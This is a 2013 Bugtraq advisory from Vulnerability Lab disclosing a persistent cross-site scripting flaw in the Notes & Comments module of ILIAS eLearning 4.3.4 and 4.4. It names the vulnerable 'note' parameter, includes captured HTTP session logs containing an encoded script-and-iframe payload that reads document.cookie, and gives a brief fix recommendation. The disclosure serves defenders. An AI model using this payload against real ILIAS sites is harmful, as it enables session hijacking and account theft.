[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: ILIAS eLearning 4.3.4 & 4.4 CMS - Persistent Notes Web Vulnerability
From: Vulnerability Lab <research () vulnerability-lab ! com>
Date: 2013-10-28 13:10:10
Message-ID: 526E6232.4010203 () vulnerability-lab ! com
[Download RAW message or body]
Document Title:
===============
ILIAS eLearning 4.3.4 & 4.4 CMS - Persistent Notes Web Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1122
Release Date:
=============
2013-10-27
Vulnerability Laboratory ID (VL-ID):
====================================
1122
Common Vulnerability Scoring System:
====================================
3.9
Product & Service Introduction:
===============================
ILIAS is a web base learning management system (LMS, VLE). Features: Courses, SCORM \
1.2 and 2004, mail, forum, chat, groups, podcast, file sharing, authoring, CMS, \
test, wiki, personal desktop, LOM, LDAP, role based access.
(Copy of the Homepage: http://sourceforge.net/projects/ilias/ )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple vulnerabilities in the \
ILIAS eLearning v4.3.4 & v4.4 CMS web-application.
Vulnerability Disclosure Timeline:
==================================
2013-10-27: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
ILIAS
Product: ILIAS eLearning - Content Management System 4.3.4 & 4.4
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
A persistent input validation web vulnerability is detected in the ILIAS eLearning \
v4.3.4 & v4.4 CMS web-application. The bug allows an attacker (remote) to \
implement/inject malicious own malicious persistent script codes (application side).
The persistent web vulnerability is located in the `Notes & Comments` module. Remote \
attackers are able to inject own malicious script code via POST method request in \
the vulnerable comment or note parameters. The execute occurs in the in the comments \
and private notes modules of the admin panel.
Exploitation of the persistent web vulnerability requires low user interaction and a \
low privileged web-application user account. Successful exploitation of the \
vulnerability can lead to persistent session hijacking (customers), account steal via \
persistent web attacks, persistent phishing or persistent module context \
manipulation.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] Notes
[+] Comments
Vulnerable Parameter(s):
[+] note
Affected Module(s):
[+] Private Notes
[+] Comments Review
Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by remote \
attackers with low user interaction and low privileged web-application user account. \
For demonstration or to reproduce ...
PoC: Public Comments & private Notes
<div class="ilNote">
<a name="note_35"><!-- <img src="./templates/default/images/note_unlabeled.png" \
alt="Note" title="Note" border="0" style="vertical-align:text-bottom; \
margin-bottom:2px;"/> --></a> <span class="small light"> Last edited on 26. Oct \
2013</span> <div class="ilNoteText"><h4 \
class="ilNoteTitle"></h4>><%20%20"<[PERSISTENT INJECTED SCRIPT CODE!]"> </div></div>
--- PoC Session Logs ---
Status: 302[Found]
POST http://ilias.localhost:8080/ilias.php?
note_type=1&cmd=post&cmdClass=ilnotegui&cmdNode=eu:jl:jk&baseClass=ilPersonalDesktopGUI&fallbackCmd=getNotesHTML&rtoken=2d302c4c574f61fc880f393433703e1b \
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ]
Content Size[20]
Mime Type[text/html]
Request Headers:
Host[ilias.localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[http://ilias.localhost:8080/ilias.php?note_type=1¬e_id=35&cmd=editNoteForm&cmdClass=ilnotegui&cmdNode=eu:jl:jk&baseClass=ilPersonalDesktopGUI]
Cookie[ilClientId=demo; PHPSESSID=mgvf9np8j9394rr0jdjg6kcqb2; iltest=cookie; \
authchallenge=459071aa3327de70506cb2a465507bf5] Connection[keep-alive]
Post Data:
note[%3E%22%3Ciframe+src%3Dhttp%3A%2F%2Fvulnerability-lab.com%2F%3E%40gmail.com%0D%0A%3E
%22%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%3Cdiv+style%3D%221%40gmail.com%0D%0A%3E%22%3Cscript%3Ealert%28
document.cookie%29%3C%2Fscript%3E%40gmail.com]
cmd%5BupdateNote%5D[Update+Note]
note_id[35]
Response Headers:
Date[Sat, 26 Oct 2013 21:12:44 GMT]
Server[Apache/2.2.22 (Ubuntu)]
X-Powered-By[PHP/5.3.10-1ubuntu3.8]
Expires[Thu, 19 Nov 1981 08:52:00 GMT]
Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]
Pragma[no-cache]
Location[http://ilias.localhost:8080/ilias.php?note_mess=mod&cmd=showNotes&cmdClass=ilnotegui&cmdNode=eu:jl:jk&baseClass=ilPersonalDesktopGUI#notes_top]
Vary[Accept-Encoding]
Content-Encoding[gzip]
Content-Length[20]
Keep-Alive[timeout=5, max=100]
Connection[Keep-Alive]
Content-Type[text/html]
Status: 200[OK]
GET http://ilias.localhost:8080/ilias.php?note_mess=mod&cmd=showNotes&cmdClass=ilnotegui&cmdNode=eu:jl:jk&baseClass=ilPersonalDesktopGUI#notes_top \
Load Flags[LOAD_DOCUMENT_URI LOAD_REPLACE LOAD_INITIAL_DOCUMENT_URI ]
Content Size[4997]
Mime Type[text/html]
Request Headers:
Host[ilias.localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[http://ilias.localhost:8080/ilias.php?note_type=1¬e_id=35&cmd=editNoteForm&cmdClass=ilnotegui&cmdNode=eu:jl:jk&baseClass=ilPersonalDesktopGUI]
Cookie[ilClientId=demo; PHPSESSID=mgvf9np8j9394rr0jdjg6kcqb2; iltest=cookie; \
authchallenge=459071aa3327de70506cb2a465507bf5] Connection[keep-alive]
Response Headers:
Date[Sat, 26 Oct 2013 21:12:44 GMT]
Server[Apache/2.2.22 (Ubuntu)]
X-Powered-By[PHP/5.3.10-1ubuntu3.8]
Expires[Thu, 19 Nov 1981 08:52:00 GMT]
Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]
Pragma[no-cache]
P3P[CP="CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT CNT STA \
PRE"] Vary[Accept-Encoding]
Content-Encoding[gzip]
Content-Length[4997]
Keep-Alive[timeout=5, max=99]
Connection[Keep-Alive]
Content-Type[text/html; charset=UTF-8]
Reference(s):
ilias.localhost:8080/ilias.php?baseClass=ilPersonalDesktopGUI&cmd=jumpToSelectedItems
ilias.localhost:8080/ilias.php?note_mess=mod&cmd=showNotes&cmdClass=ilnotegui&cmdNode=eu:jl:jk&baseClass=ilPersonalDesktopGUI#notes_top
ilias.localhost:8080/ilias.php?note_type=1&cmd=post&cmdClass=ilnotegui&cmdNode=eu:jl:jk&baseClass=ilPersonalDesktopGUI&fallbackCmd=getNotesHTML&rtoken=x
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and encode of the note input \
field. Recognize also the affected output section were the vulnerable value executes.
Security Risk:
==============
The security risk of the persistent input validation web vulnerability is estimated \
as medium(+).
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri \
(bkm@evolution-sec.com)
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. \
Vulnerability Lab disclaims all warranties, either expressed or implied, including \
the warranties of merchantability and capability for a particular purpose. \
Vulnerability- Lab or its suppliers are not liable in any case of damage, including \
direct, indirect, incidental, consequential loss of business profits or special \
damages, even if Vulnerability-Lab or its suppliers have been advised of the \
possibility of such damages. Some states do not allow the exclusion or limitation of \
liability for consequential or incidental damages so the foregoing limitation may \
not apply. We do not approve or encourage anybody to break any vendor licenses, \
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - \
www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - \
admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - \
magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - \
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - \
vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires \
authorization from Vulnerability Laboratory. Permission to electronically \
redistribute this alert in its unmodified form is granted. All other rights, \
including the use of other media, are reserved by Vulnerability-Lab Research Team or \
its suppliers. All pictures, texts, advisories, source code, videos and other \
information on this website is trademark of vulnerability-lab team & the specific \
authors or managers. To record, list (feed), modify, use or edit our material \
contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a \
permission.
Copyright © 2013 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic